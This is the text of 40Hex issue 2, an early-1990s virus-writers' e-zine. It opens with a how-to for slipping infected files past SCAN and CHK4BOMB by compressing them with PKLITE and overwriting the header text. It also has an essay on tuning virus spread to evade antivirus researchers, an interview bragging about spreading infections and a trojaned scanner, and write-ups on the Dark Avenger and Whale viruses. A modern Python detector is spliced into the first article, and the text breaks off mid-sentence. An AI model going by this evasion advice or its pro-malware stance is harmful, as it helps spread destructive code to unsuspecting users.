40Hex Volume 1 Issue 2
0000

001...............................How to sneak infected files past SCAN.
002...............................The safe way to play with viruses.
003...............................Theory Dept.  Viruses Slow vs. Fast.
004...............................Interview of the month: Skism One.
005...............................Article on The Dark Avenger.
006...............................The mother of all viruses - WHALE!
007...............................And now a word from a real dick.
008...............................The Ontario Virus.
009...............................The 1260 Virus.
010...............................The Skism 808 source code.
011...............................Vienna/Violator source code.




40Hex Staff

Hellraiser....................Editor/Programming Consultant etc...
Nick Haflinger -=PHALCON=-....Co-Editor/Writer/Theory Consultant
Skism One.....................Virus supply/Co-Programming Consultant
The Punisher (Brooklyn).......Virus supply
Garbage Heap..................Main Virus Supply/Overseer
Spell Checker.................Obvoiusly there is none

Call the 40HEX/SKISM Homebase      -----    The Landfill BBS (914)-HAK-VMBS
                                            Sysop Garbage Heap.

 Any articles to the 40Hex HQ - The Landfill BBS!

 Special shout out to - Sub-Zero (the hard core group), DC Wave, all the
                        kids at school.

40Hex Volume 1 Issue 2
0001

             - HOW TO GET INFECTED FILES INTO LAME BBS's -

Ok, one problem with sending infected files to BBS's is that you never
can tell if they will be detected by SCAN.  Or if you are sending bombs
the sysop might use CHK4BOMB to detect code that is data damaging.

I'm gonna tell you how to get around this, what you need is the following-

                            PKLITE or LZEXE
                                   and
                           A good hex editor

What you do is this, compress the infected file with PKlite or LZexe.  This
will change the file's checksum and ID strings quite a bit so it can't
be detected by SCAN and damaging data will not be found by CHK4BOMB.  The
problem is that now the sysop can use CHK4LITE to detect if the file is
indeed infected.   So what you do is this --

Load up the hex editor -

Now look at the file, it will look something like this if you compressed it
with PKLITE.


------------------------------------------------------------------------------

0000  4D 5A 12 01 13 00 00 00-07 00 98 05 4A A4 52 02  MZ..........J.R.
0010  00 04 00 00 00 01 F0 FF-50 00 00 00 03 01 50 4B  ........P.....PK
0020  4C 49 54 45 20 43 6F 70-72 2E 20 31 39 39 30 20  LITE Copr. 1990 
0030  50 4B 57 41 52 45 20 49-6E 63 2E 20 41 6C 6C 20  PKWARE Inc. All 
0040  52 69 67 68 74 73 20 52-65 73 65 72 76 65 64 0   Rights Reserved
0050  0A 00 20 00 17 01 48 00-4A 04 4A A4 E2 03 00 40  .. ...H.J.J....@
0060  00 00 56 11 00 00 1C 00-00 00 00 00 00 00 00 00  ..V.............
0070  B8 E3 07 BA 4B 02 8C DB-03 D8 3B 1E 02 00 73 1D  ....K.....;...s.
0080  83 EB 20 FA 8E D3 BC 00-02 FB 83 EB 19 8E C3 53  .. ............S
0090  B9 C3 00 33 FF 57 BE 48-01 FC F3 A5 CB B4 09 BA  ...3.W.H........
00A0  36 01 CD 21 CD 20 4E 6F-74 20 65 6E 6F 75 67 68  6..!. Not enough
00B0  20 6D 65 6D 6F 72 79 24-FD 8C DB 53 83 C3 2D 03   memory$...S..-.
00C0  DA BE FE FF 8B FE 8C CD-8B C5 2B EA 8B CA D1 E1  ..........+.....

------------------------------------------------------------------------------


You see the header?  Well what you have to do is overwrite the header with
garbage.  Don't write text cause that is too detectable by a dump program.
Just overwrite the part that says "PKLITE Copr....Reserved" with hex bytes.
Also destroy the part of the code that says "Not enough memory", don't kill
the "$" symbol.

This will make the compressed file-

A> Undetectable to virus scanners, and CHK4BOMB type programs
B> Un-Decompressable
C> CHK4LITE won't notice it as a PKLITE file

It's that easy!

Keep in mind however that any file that the virus infects will no longer
be encrypted by PKLITE, so this method is good only on getting your virus
into the front door.

See the article in issue one on making new virus strains.

                            Forenote

     After writing this article SCAN version 80 came out, it now has the
     ability to scan into PKlite compressed files.  Just to let you know that
     this technique still works and SCAN cannot detect the file as being
     compressed as PKLITE.

                    HR
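
Added example (not part of the original article): a defender-side check that keys on the MZ header fields and the code at the entry point rather than on the banner text, so a file whose banner has been overwritten is still recognised and the mismatch itself is reported. The masked pattern is taken from row 0070 of the dump above and is an assumption built from that single dump, not a vendor signature; `parse_mz`, `classify` and `build_sample` are hypothetical names, and the sample input is constructed.

```python
import struct

# Entry-point byte pattern copied from row 0070 of the dump in the article.
# None marks operand bytes treated as wildcards. Assumption: derived from that
# one dump for illustration only; it is not a vendor signature.
STUB_PATTERN = [0xB8, None, None, 0xBA, None, None, 0x8C, 0xDB,
                0x03, 0xD8, 0x3B, 0x1E, 0x02, 0x00, 0x73, None]
BANNER = b"PKLITE Copr."


def parse_mz(data):
    """Return (header_size, entry_file_offset) for a DOS MZ file, else None."""
    if len(data) < 0x1C or data[:2] not in (b"MZ", b"ZM"):
        return None
    (e_cparhdr,) = struct.unpack_from("<H", data, 0x08)  # header size, paragraphs
    e_ip, e_cs = struct.unpack_from("<HH", data, 0x14)   # initial IP, initial CS
    header_size = e_cparhdr * 16
    # CS:IP is relative to the start of the load module; real-mode address
    # arithmetic wraps at 1 MiB (the dump's FFF0:0100 wraps to offset 0).
    linear = ((e_cs << 4) + e_ip) & 0xFFFFF
    return header_size, header_size + linear


def stub_matches(data, offset):
    """True if the bytes at offset match STUB_PATTERN (wildcards allowed)."""
    chunk = data[offset:offset + len(STUB_PATTERN)]
    return len(chunk) == len(STUB_PATTERN) and all(
        want is None or want == got for want, got in zip(STUB_PATTERN, chunk))


def classify(data):
    """Classify a file by entry-point code first, banner text second."""
    parsed = parse_mz(data)
    if parsed is None:
        return "not-mz"
    header_size, entry = parsed
    has_banner = BANNER in data[:header_size]
    has_stub = stub_matches(data, entry)
    if has_stub:
        # Stub present but banner gone: the header text was altered after packing.
        return "pklite" if has_banner else "pklite-stub-banner-missing"
    return "banner-only" if has_banner else "no-match"


def build_sample(banner=True, stub=True):
    """Constructed test input: a 0x70-byte MZ header plus 16 code bytes."""
    hdr = bytearray(0x70)
    hdr[0:2] = b"MZ"
    struct.pack_into("<H", hdr, 0x08, 7)                 # 7 paragraphs = 0x70
    struct.pack_into("<HH", hdr, 0x14, 0x0100, 0xFFF0)   # IP, CS as in the dump
    text = b"PKLITE Copr. 1990 PKWARE Inc. All Rights Reserved"
    hdr[0x1E:0x1E + len(text)] = text if banner else b"\xAA" * len(text)
    code = (bytes.fromhex("b8e307ba4b028cdb03d83b1e0200731d")
            if stub else b"\x90" * 16)
    return bytes(hdr) + code


if __name__ == "__main__":
    cases = {
        "packed, banner intact": build_sample(),
        "packed, banner overwritten": build_sample(banner=False),
        "banner text only": build_sample(stub=False),
    }
    for name, blob in cases.items():
        print(f"{name:28s} -> {classify(blob)}")
```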
40Hex Volume 1 Issue 2
0002

               THE SAFE WAY TO EXPERIMENT WITH VIRUSES

 The problem with fooling around with viruses is that you never know
 what damage they're going to do to your hard disk.  I have a couple of
 so called viruses that when run, automatically screw up the FAT on
 all the disks in the system.  Well, there's a way around getting the
 shaft from these programs, and also to experiment with legitimate
 viruses.

 The key is the DOS utility SUBST, make this batch file, and copy it
 to a floppy.

 ------------------------------------------------------------------------------
 @ECHO OFF
 SUBST D: A:\
 SUBST C: A:\
 ------------------------------------------------------------------------------

  What this will do is send any access to disks C: and D: (the two
  hard disks in my case) to drive A:  So the only damage inflicted
  will be to the floppy in A:

  No programs can access your hard disk when this command is issued.  I
  use it all the time and as of now it has proved 100% safe.

  Oh yeah, if you don't feel like destroying a floppy every time you
  mess with a virus, you can do this technique from a RAM disk.

  Have fun...

                         HR

40Hex Volume 1 Issue 2
0003

                         Virus Spreading - Fast Or Slow?
                         By Nick Haflinger -=PHALCON=-

                         Call The LandFill BBS (914)Hak-Vmbs

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

One of the questions while writing your virus is how quickly you want it
to spread.  The easy answer is "As fast as possible" but this is not always the
best answer.  If a virus moves slowly, it will take much longer before somebody
notices hard drive space disappearing, he/she will notice fewer changes to the
file dates, and all other symptoms will be lessened.  However, this does provide
longer for anti-virus people (pronounced Scum, with a capital S) to discover the
virus.  This issue ties directly into the issue of activation, short or long.
Since the issues are virtually identical, I will cover both together, because
they are so closely tied.

                        The Case For Fast
                        =================

    Viri should spread as quickly as possible.  This allows as little time
as possible for the makers of antivirus programs to come up with an antidote
before the virus is widely spread.  This should be tied with a short activation
period to cause as many problems as possible before detection is possible.
Because fewer copies are generated before activation, each copy may be larger.
This allows for more extensive anti-anti-viral tactics, which are becoming
increasingly more important as the number of anti-viral products rises.  Just
remember, most of these products are shit. So don't worry too much.

                        The Case For Slow
                        =================

   Viri should spread slowly, because this is less obtrusive, and therefore
users are less likely to notice a change in the system.  This should be coupled
with a long activation period as to have maximum penetration before the virus
activates.  A slow-spreading virus will circulate to more virus programmers who
will be able to modify the program for specific needs or to adapt to antiviral
tactics.  On a purely academic note, slow spreading viri must be smaller, as
more copies must be generated.  This means that viri must be programmed better,
which is good for the general community.

                        The Case Against Fast
                        =====================

     Fast spreading of viri is likely to draw attention.  Once a virus has
been caught, in most of the cases, it is dead and useless.  A virus should
infect the greatest area in the shortest time before the anti-virus people
inevitably catch up to the virus.  However, because of the necessity of a short
activation time, this virus has a lesser range than a slow-spreading virus.  The
programmer must rely on either (a) the quick distribution of the virus along at
least a regional level --or-- (b) the ability of other virus programmers to
obtain and modify either the source code or disassemble and modify the
distributed virus.  If possible, the source should be distributed along trusted
channels.  There should be as little chance as possible of an antiviral
researcher obtaining a copy of the source for your masterpiece.

                        The Case Against Slow
                        =====================

        A slow spreading virus is much more likely to get caught by antiviral
people prior to its necessarily long pre-activation period.  There will be more
defenses out against the virus before it has spread much.  However, if the virus
is well-done, it will have spread far before it is caught.

                        Conclusion
                        ==========

    Actually, I lied.  There is no conclusion to be drawn from this, as this
is in itself the conclusion of long hours of thought and much brainstorming on
BBSs.  If you would like to comment, I can be reached on LandFill BBS, phone
number above.  In a future article, I will attempt to cover anti-anti-virus
tactics.  I may also respond to some important questions/comments I may receive.
Start your viri now!  And may the best bug win!

                       NH
40Hex Volume 1 Issue 2
0004

                       Interview with Skism One - AKA Lord SSS (Triple S)

        This interview was 

            Square Park, Manhattan.

HR:  So what got you started in the virus business?

SSS: Well, I used to write graffiti all over and that got sort of
     played out, so I needed something else destructive to do.  So
     I started getting into computers, then the next thing you know
     I'm writing viruses.

HR:  What was your first experience with viruses?

SSS: Well the first time I heard of them was when that dickhead got
     arrested for putting the worm...

HR:  You mean Morris?

SSS: Yeah that asshole, it was on the news and all that - so I got
     to thinking, that would be a cool thing to do.

HR:  What was the first virus you ran across?

SSS: Ha... Some dick gave me a copy of (pause) I think it was
     Norton 4.0 when it first came out.  So I took it home and put
     it on my hard drive.  The next thing you know all this weird
     shit starts going on.  Like programs won't run and this little
     box opens up on the bottom of my screen all of a sudden.  So I
     get a copy of SCAN, then I find out almost all my files are
     infected with Jerusalem.

HR:  What did you do?

SSS: Well I re-formatted the drive and examined the copy of Jeru for
     months.  Then one day I used a Hex editor to change the suMSDOs
     string to SKISM-1.  Then I went to all the computers I could
     find and infected them.  The next thing you know my friend
     shows me this list with my name on it.  It was Patti Hoffman's
     document.  Shit, I thought I was the man back then.

HR:  Then what?

SSS: Then - well I got into assembler and disassembly and I started
     to learn how to modify the code and all that.  The next thing
     you know I had made my own virus from the scraps of Jeru.

HR:  Captain Trips, right?

SSS: Yeah, sort of.  Then someone I know sent it to all the boards
     in town under a trojan name and fucked a lot of people's shit
     up.  Oh well.  Then I guess I grew out of the scavenger mode
     and started writing my own shit, from scratch.

HR:  Like what?

SSS: Well they were all called Skism so and so, like Skism 10, Skism
     11 and all that.  Then I met people and they started helping
     me out and now we got this thing going on.

HR:  You mean Smart Kids Into Sick Methods?

SSS: Yeah, you know all thid did did dat.

HR:  How do you name your viruses?

SSS: Well depends what's on my mind.  Skism was my tag for like four
     years, so I thought it would be cool if people saw my name in
     the newspaper and all that.  I got Captain Trips after reading
     The Stand, by Stephen King.  1992 was just what I named it cause
     the virus came out to be about 1945 bytes so I just padded it out
     to next year's date.  808 was named after the TR-808, a 'drum
     machine' used in hip-hop.

HR:  What's the latest projects?

SSS: You know, you wrote most of the shit.

HR:  Tell them.  The people.

SSS: Well, we did SKISM 1992, which was funny, then a member of
     SKISM, who shall be nameless made 808.  Now I'm just taking a
     break from viruses and computers for the summer.

HR:  You stopped?

SSS: You're crazy, nah - It's got to wait a while, then I'll get back
     into it - when school starts again.

HR:  What do you think of McAfee?

SSS: He's cool, what the fuck am I supposed to say.  He does a good
     job at spreading my name around.  I really like Pat Hoffman,
     thanks for the write ups.  You got to understand - these people
     make us into infamous villains.  I can deal with that.

HR:  Do you mind them detecting your viruses?

SSS: Nah, fuck it - If my shit can make it from NY to California
     without effort, it shows it works.  That's it.  There's a lot more
     where that came from.  One more thing, I hate that gay bitch
     Ross Greenberg author of Flu-Shot.  What a dick.  He's just an
     asshole trying to sell his shit product.
     He's got a big mouth and instead of crashing his board, I'd
     like to kick his fucken ass.  Where's his office?  Up on 57th
     right?  Lets take a walk.  Just kiddin' but the guy's product
     sucks and he's just a greedy asshole.  I'm glad I sent a trojan
     version of his virus scanner around. Ha you dick!

HR:  What virus authors do you look up to?

SSS: Myself - Ha Ha (laughter) Ha Ha.  No, I love Whale - that was
     clever.  I like Dark Avenger, the real one.  It's hard to be
     original, and these guys were.  Hats off you crazy fuckin'
     Bulgarian Metal-Head!

HR:  What about groups of virus writers?

SSS: I think we're the only one.  Oh yeah and those Rabid people you
     told me about, yeah they're just like us - people trying to make
     their mark in the world, or should I say dent in the world.
     Germans are bugging out too - Shit, they write half the shit out
     there these days.  More power to them

HR:  What is your advice to people who want to write viruses?

SSS: Get a late pass!  No as I said more power to you. Just remember
     you got to have style and learn to be ORIGINAL.

HR:  What next from you?

SSS: I don't really know.  I'm waiting to hook up a few more people
     to the pack, then we'll get the thing rollin HARD.  Till then
     'A little at a time...'

    At the time this article was finished, the Skism team was at work on
         a new virus code named Bad Brains.

                       HR
40Hex Volume 1 Issue 2
0005

                       The Dark Avenger
                       --- ---- -------

Part I.  The Dark Avenger
-------------------------

Introduction:

The following text file was sent directly to Professor
Vesselin Bontchev in a public sent to an anti-viral board
located in Sofia, Bulgaria.

Bontchev is one of the leading anti-viral researchers in
Europe today.  A producer of a number of effective anti-viral
programs in Bulgaria, his programs are widely used throughout
Europe.

The Dark Avenger is Bulgaria's most dangerous viral code
writer and a heavy metal fanatic - as this message concerning
himself, written by him (often referring to himself in third
person) reveals:

----------------  DARK AVENGER   ============

   DARK AVENGER is the pseudonym used by a particularly prolific and
   malicious Bulgarian virus writer. It is also the name given in the
   West to some of his earlier viruses. His viruses include:

   DARK AVENGER V651, V1800, V2000 and V2100

   NUMBER OF THE BEAST aka 512 (several versions)

   ANTHRAX (Infects both files and boot sectors)

   V800 and its derivatives: 1226, PROUD, EVIL & PHOENIX

   Some other viruses, e.g. NOMENKLATURA & DIAMOND are in his style but
   are believed to be the work of others. MURPHY has been strongly
   influenced by him but is known to be of different authorship.
   CRAZY EDDIE may also be his.

   Several 'hacks' are now appearing of V1800, V2100, MURPHY and
   DIAMOND.

Eddie is the mascot of the British heavy metal group, Iron Maiden
(hence 'up the irons'). It is a 20 foot high skeleton that appears
on stage with them and is featured on the sleeves of all their albums.
Anthrax and Damage Inc are other heavy metal groups whose names have
been featured in some Dark Avenger viruses. Iron Maiden numbers have
also been mentioned including 'Somewhere in Time', 'Only the Good Die
Young' and 'Number of the Beast'.

Unusually, this virus writer has also produced a virus removal
program together with a version log of his EDDIE series, as
reproduced below with its original spelling and grammar.

"DOCTOR   QUICK!   Virus Doctor for the Eddie Virus   Version 2.01
10-31-89 Copyright (c) 1988-89 Dark Avenger.  All rights reserved.
DOCTOR /? for help

It may be of interest to you to know that Eddie (also known as "Dark
Avenger") is the most widespread virus in Bulgaria for the time
being.  However I have inforation that Eddie is well known in the
USA, West Germany and USSR too.

I started in writing the virus in early September 1988. In those
times there were no any viruses in Bulgaria, so I decided to write
the first Bulgarian virus.  There were some different Eddie's  versions:

VERSION 1.1, 16-DEC-1988

In December I've decided to enhance the virus.  This version could
infect files during their opening.  For that reason, a read buffer
was allocated in high end of memory, rather than using DOS function
48h when needed.  The disk was destroyed instead of the infected files.

VERSION 1.2, 19-DEC-1988

This added a new feature that causes (for example) compiled programs
to be infected at once if the virus is resident.  Also, the "Eddie
lives..." message was added (can you guess why exactly "Eddie"?)

VERSION 1.31, 3-JAN-1989

This became the most common version of Eddie. A code was added to
find the INT 13 rom-vector on many popular XT's and AT's.  Also,
other messages were added so its length would be exactly 1800 bytes.
There was a subsequent, 1.32 version (19-JAN-1989), which added
self-checksum and other interesting features that was abandoned
because it was extremely buggy.

In early March 1989 version 1.31 was called into existence and
started to live its own life to all engineers' and other suckers'
terror.  And, the last

VERSION 1.4, 17-OCT-1989

This was a bugfix for version 1.31, and added some interesting new
features.  Support has been added for DOS 2.x and DOS 4.x.  For
further information about this (the most terrible) version, and to
learn how to find out a p

virus-writers are still not dead, contact Mr. Vesselin Bontchev (All
Rights Reserved).

So, never say die!  Eddie lives on and on and on...  Up the irons!"

NOTE:
  Vesselin Bontchev, who the Dark Avenger is trying to discredit, is a
leading virus researcher at the Bulgarian Academy of Sciences.

Post Note:

There is a rumor concerning the fact that RABID now has
the Dark Avenger on their staff of virus writers, and that
the new Dark Avenger variant released by them was, in fact,
written by him.  This has yet to be proven.

The more acceptable belief concerning this new strain
is that RABID simply picked up the source code for Dark Avenger,
released last December, and modified it.


Part II - Dark Avenger - Strain A
---------------------------------

Vesselin Bontchev reports in May 1990:

The Dark Avenger virus.
======================

- I found two new mutations of this virus. Well, maybe
"mutations" is not the correct word. In the first of them, the
first 16 characters of the string "Eddie lives...  somewhere in
time!" were replaced with blanks.

In the second example, all strings (the message above, the
copyright message and the "Diana P."  string) were replaced with
blanks.

- The author of the Dark Avenger virus (The bastard!  I
still cannot determine who he is.) has released the source code
of his virus.

It is full with ironic comments about me.  Of course, now we have
to expect lots of new, similar viruses to appear.  At least, this
leaded to one good thing - the source helped me very much in
disassembling the V2000 virus.

- I received a rather offensive
anonymous letter from this person.  In it he claims to be also
the author of both the V2000 (I trust this) and the Number of the
Beast viruses (the latter is unlikely).  [See Above]



Information About the Dark Avenger Virus, courtesy of
"Virus Bulletin Ltd," Buckinghamshire, England.

Note:

This information is far more valuable than the standard
Virus Summary by Patricia Hoffman.  Her entry concerning DA
fails to go into more depth about the Dark Avenger virus and
apparently she has yet to receive information of the
different versions of DA.  Such information is already a year
old, but she has yet to include it.

Entry...............: Dark Avenger
Alias(es)...........: ---
Virus Strain........: Dark Avenger
Virus detected when.: November 1989
              where.: USA
Classification......: February 1990
Length of Virus.....: about 1800 Bytes
--------------------- Preconditions -----------------------------------
Operating System(s).: DOS
Version/Release.....:
Computer model(s)...: IBM-compatible
--------------------- Attributes --------------------------------------
Easy Identification.: Two Texts:
                      "Eddie lives...somewhere in time" at beginning
                      and
                      "This Program was written in the City of Sofia
                      (C) 1988-89 Dark Avenger" near end of file
Type of infection...: Link-virus
                      COM-files: appends to the program and installs a
                      short jump
                      EXE-files: appends to the program at the beginning
                      of the next paragraph
Infection Trigger...: COM and EXE files are corrupted on any read attempt
                      even when VIEWING!!!
Storage media affected: Any Drive
Interrupts hooked...: Int 21 DOS-services
                      Int 27 Terminate and Stay Resident
Damage..............: Overwrites a random sector with bootblock
Damage Trigger......: each 16th infection; counter located in Bootblock
Particularities.....: -
Similarities........: -
--------------------- Agents ------------------------------------------
Countermeasures.....: NONE! All data can be destroyed !!!!
                      There is no way in retrieving lost data.
                      Backups will most probably be destroyed too.
Countermeasures successful: install McAfee's SCANRES.
Standard means......: Good luck! Hopefully the virus did not destroy
                      too many of your programs and data.
--------------------- Acknowledgement ---------------------------------
Location............: VTC Uni Hamburg
Classification by...: Matthias Jaenichen
Documentation by....: Matthias Jaenichen
Date................: 31.01.1990
 


Part III - DARK AVENGER 2000
============================

Date:    02 Feb 90 10:49:00 +0700
From:    Vesselin Bontchev

This virus is also "made in Bulgaria" and again I am indirectly the
cause of its creation.  I am a well known "virus-buster" in Bulgaria
and my antivirus programs are very widely used.  Of course, virus
designers didn't like it.  So their next creation...  causes trouble
to my antivirus programs.

This virus is exactly 2000 bytes long and I think that it was
created by the author of the Eddie (Dark Avenger) virus.  The
programming style is the same and there are even pieces of code
which are the same.

The virus acts much like the Eddie one --- it installs resident in
memory by manipulating the memory control blocks; infects
COMMAND.COM at the first run; infects both .COM- and .EXE-files;
infects files when one executes them as well as when one copies them.

However, there are some extras added.  First, the virus is able to
fetch the original INT 13h vector just like the V512 one (by using
the same undocumented function --- tricks spread fast between virus
programmers).

Second, it intercepts the find-first (FCB) and find-next (FCB)
functions --- just like V651 (aka EDDIE II) (and contains the same
bugs), so you won't see the increased file lengths in the listing
displayed by the DIR command.

Third, it contains the string "Copyright (C) 1989 by Vesselin
Bontchev", so people may think that I am the author of this virus.
In fact, the virus searches every program being executed for this
string (the case of the letters does not matter) and if found,
hangs the system.  It is not necessary to tell you that all my
antivirus programs contain this string.  Of course, now I will have
to use some kind of encryption, just to prevent such tricks.


Vesselin Bontchev reported in May 1990:

The V2000 virus (DARK AVENGER 2000)
===================================

- It turned out that the example of this virus I sent to some of
  the antivirus researchers was not the original version.  The
  original contains the string "Only the Good die young..."
  instead of the "Copy me - I want to travel" message.  Also a
  small piece of code in the original version was patched to
  contain the "666" string. (That is, the version you have contains
  this string, the original does not.)

- There exists also a small mutation of the version you have.
  The only difference is that the 'C' character in the word "Copy"
  was changed to 'Z'.

- When describing the V2000 virus, I stated that it halts the
  computer if you run a program which contains the string
  "Copyright (c)1989 by Vesselin Bontchev". This is not quite
  correct. In fact, the programs are only checked for the "Vesselin
  Bontchev" part of the string.

- I obtained John McAfee's program Clean, version 60.  In the
  accompanying documentation he states about the V2000 virus that
  "The virus is very virulent and has caused system crashes and
  lost data, as well as causing some systems to become non-bootable
  after infection".  This is not very correct, or at least, there
  is much more to be said.  The virus is exactly as virulent as the
  Dark Avenger virus, and for the same reason.  It infects files
  not only when one executes them, but also when one reads or
  copies them. This is achieved exactly in the same manner as in
  the Dark Avenger.  The systems become non-bootable when the virus
  infects the two hidden files of the operating system - it cannot
  distinguish them from the regular .COM files.  By the way, the
  Dark Avenger virus often causes the same effect.  And at last,
  but not least (:-)), the virus is highly destructive - just as
  the Dark Avenger is.  It destroys the information on a randomly
  selected sector on the disk once in every 16 runs of an infected
  program. The random function is exactly the same, and the
  counters (0 to 15 and for the last attacked sector) are exactly
  the same and on the same offsets in the boot sector as with the
  Dark Avenger virus.  The main difference is that the destroyed
  sector is overwritten not with a part of the virus body, but with
  the boot sector instead.  This makes a bit more difficult to
  discover which files are destroyed - the boot sector is contained
  in many "good" programs, such as FORMAT, SYS, NDD.  Also, the
  nastiest thing - the damage function is not performed via INT 26h
  (which can be intercepted).  The virus determines the address of
  the device driver for the respective disk unit (using an
  undocumented DOS function call, of course.  I begin to wonder if
  Ralf Brown did any good when he made the information in the
  INTERxyy file available :-)).  Then it performs a direct call to
  that address.  The device driver in DOS does its work and issues
  the appropriate INT 13h.  However the virus has scanned the
  controllers' ROM space and has determined the original address of
  the interrupt handler - just as the Dark Avenger virus does.
  Then it has temporary replaced the INT 13h vector with the
  a

  cannot be intercepted.

- Also this virus (unlike Dark Avenger) supports PC-DOS version
  4.0 and will work (and infect) under it.

- The bytes 84 A8 A0 AD A0 20 8F 2E in the virus body are the
  name "Diana P.", this time written in cyrillics.


        Unknown Source


        40hEX vOLUME 1 iSSUE 20006



        tHE wHALE vIRUS



       oH YES HERE IT IS, THE BIGGEST AND MEANEST VIRUS AROUND.  fIRST

       BEFORE YOU GO AND COMPILE IT READ WHAT pATTI THINKS OF IT.



     aLIASES:     mOTHER fISH, sTEALTH vIRUS, z tHE wHALE
 v
     sTATUS:    rESEARCH

     dISCOVERED:  aUGUST, 1990

     sYMPTOMS:   .com & .exe GROWTH; DECREASE IN AVAILABLE MEMORY;

                  SYSTEM SLOWDOWN; VIDEO FLICKER; SLOW SCREEN WRITES;

                  FILE ALLOCATION ERRORS; SIMULATED SYSTEM REBOOT

    ORIGIN:      hAMBURG, wEST gERMANY

    eFF lENGTH:  9,216 bYTES

    tYPE cODE:   prHa - pARASITIC rESIDENT .com & .exe iNFECTOR

    dETECTION mETHOD: vIRUsCAN v67+, pRO-sCAN 2.01+, nav, ibm sCAN 2.00+

    rEMOVAL iNSTRUCTIONS:  sCAN/d, cLEANuP v67+, pRO-sCAN 2.01+,

                           OR dELETE INFECTED FILES

   gENERAL cOMMENTS:
   tHE wHALE vIRUS WAS SUBMITTED IN EARLY sEPTEMBER, 1990. tHIS VIRUS

   HAD BEEN RUMORED TO EXIST SINCE THE ISOLATION OF THE fISH 6 vIRUS IN

   jUNE, 1990.  iT HAS BEEN REFERRED TO BY SEVERAL NAMES BESIDES wHALE,

   INCLUDING mOTHER fISH AND z tHE wHALE.  tHE ORIGIN OF THIS VIRUS IS

   SUBJECT TO SOME SPECULATION, THOUGH IT IS PROBABLY FROM hAMBURG,

   wEST gERMANY DUE TO A REFERENCE WITHIN THE VIRAL CODE ONCE IT IS DECRYPTED.


   tHE FIRST TIME A PROGRAM INFECTED WITH THE wHALE vIRUS IS EXECUTED,

   THE wHALE WILL INSTALL ITSELF MEMORY RESIDENT IN HIGH SYSTEM MEMORY

   BUT BELOW THE 640k dos BOUNDARY.  oN THE AUTHOR'S xt CLONE, THE

   VIRUS ALWAYS STARTS AT ADDRESS 9d90.  aVAILABLE FREE MEMORY WILL

   BE DECREASED BY 9,984 BYTES.  mOST UTILITIES WHICH DISPLAY MEMORY

   USAGE WILL ALSO INDICATE A VALUE FOR TOTAL SYSTEM MEMORY WHICH IS

   9,984 BYTES LESS THAN WHAT IS ACTUALLY INSTALLED.


   tHE FOLLOWING TEXT STRING CAN BE FOUND IN MEMORY ON SYSTEMS

   INFECTED WITH THE wHALE VIRUS:  "z the whale".


   iMMEDIATELY UPON BECOMING MEMORY RESIDENT, THE SYSTEM USER WILL

   EXPERIENCE THE SYSTEM SLOWING DOWN.  nOTICEABLE EFFECTS OF THE

   SYSTEM SLOWDOWN INCLUDE VIDEO FLICKER TO EXTREMELY SLOW SCREEN

   WRITES.  sOME PROGRAMS MAY APPEAR TO "HANG", THOUGH THEY WILL

   EVENTUALLY EXECUTE PROPERLY IN MOST CASES SINCE THE "HANG" IS DUE

   TO THE SLOWING OF THE SYSTEM.


   wHEN A PROGRAM IS EXECUTED WITH THE wHALE MEMORY RESIDENT, THE VIRUS

   WILL INFECT THE PROGRAM.  iNFECTED PROGRAMS INCREASE IN LENGTH, THE

   ACTUAL CHANGE IN LENGTH IS USUALLY 9,216 BYTES.  nOTE THE "USUALLY":

   THIS VIRUS DOES OCCASIONALLY INFECT A PROGRAM WITH A "MUTANT" WHICH

   WILL BE A DIFFERENT LENGTH.  iF THE FILE LENGTH INCREASE IS EXACTLY

   9,216 BYTES, THE wHALE WILL HIDE THE CHANGE IN FILE LENGTH WHEN A

   DISK DIRECTORY COMMAND IS EXECUTED.  iF THE FILE LENGTH OF THE VIRAL

   CODE ADDED TO THE PROGRAM IS OTHER THAN 9,216 BYTES, THE FILE LENGTH

   DISPLAYED WITH THE DIRECTORY COMMAND WILL EITHER BE THE ACTUAL INFECTED

   FILE LENGTH, OR THE ACTUAL INFECTED FILE LENGTH MINUS 9,216 BYTES.


   eXECUTING THE dos chkdsk PROGRAM ON INFECTED SYSTEMS WILL RESULT IN

   FILE ALLOCATION ERRORS BEING REPORTED.  iF chkdsk /f IS EXECUTED,

   FILE DAMAGE WILL RESULT.


   tHE wHALE ALSO ALTERS THE PROGRAM'S DATE/TIME IN THE DIRECTORY WHEN

   THE FILE IS EXECUTED, THOUGH IT IS NOT SET TO THE SYSTEM DATE/TIME

   OF INFECTION.  oCCASIONALLY, wHALE WILL ALTER THE DIRECTORY ENTRY

   FOR THE PROGRAM IT IS INFECTING IMPROPERLY, RESULTING IN THE DIRECTORY

   ENTRY BECOMING INVALID.  tHESE PROGRAMS WITH INVALID DIRECTORY

   ENTRIES WILL APPEAR WHEN THE DIRECTORY IS LISTED, BUT SOME DISK

   UTILITIES WILL NOT ALLOW ACCESS TO THE PROGRAM.  iN THESE CASES, THE

   DIRECTORY ENTRY CAN BE FIXED WITH nORTON uTILITIES fd COMMAND TO

   RESET THE FILE DATE.


   tHE wHALE OCCASIONALLY WILL CHANGE ITS BEHAVIOR WHILE IT IS MEMORY

   RESIDENT.  wHILE MOST OF THE TIME IT ONLY INFECTS FILES WHEN

   EXECUTED, THERE ARE PERIODS OF TIME WHEN IT WILL INFECT ANY FILE

   OPENED FOR ANY REASON.  iT WILL ALSO, AT TIMES, DISINFECT FILES

   WHEN THEY ARE COPIED WITH THE dos COPY COMMAND, AT OTHER TIMES IT

   WILL NOT "DISINFECT ON THE FLY".


   oCCASIONALLY, THE wHALE vIRUS WILL SIMULATE WHAT APPEARS TO BE A

   SYSTEM REBOOT.  wHILE THIS DOESN'T ALWAYS OCCUR, WHEN IT DOES OCCUR

   THE bREAK KEY IS DISABLED SO THAT THE USER CANNOT EXIT UNEXPECTEDLY

   FROM THE EXECUTION OF THE SYSTEM'S aUTOeXEC.bAT FILE.  iF THE

   aUTOeXEC.bAT FILE CONTAINED ANY SOFTWARE WHICH DOES FILE OPENS OF

   OTHER EXECUTABLE PROGRAMS, THOSE OPENED EXECUTABLE PROGRAMS WILL

   BE INFECTED AT THAT TIME IF THEY WERE NOT PREVIOUSLY INFECTED.

   tYPICALLY, FILES INFECTED IN THIS MANNER WILL INCREASE BY 9,216

   BYTES THOUGH IT WILL NOT BE SHOWN IN A DIRECTORY LISTING.


   a HIDDEN FILE MAY BE FOUND IN THE ROOT DIRECTORY OF DRIVE c: ON

   INFECTED FILES.  tHIS FILE IS NOT ALWAYS PRESENT, THE VIRUS WILL

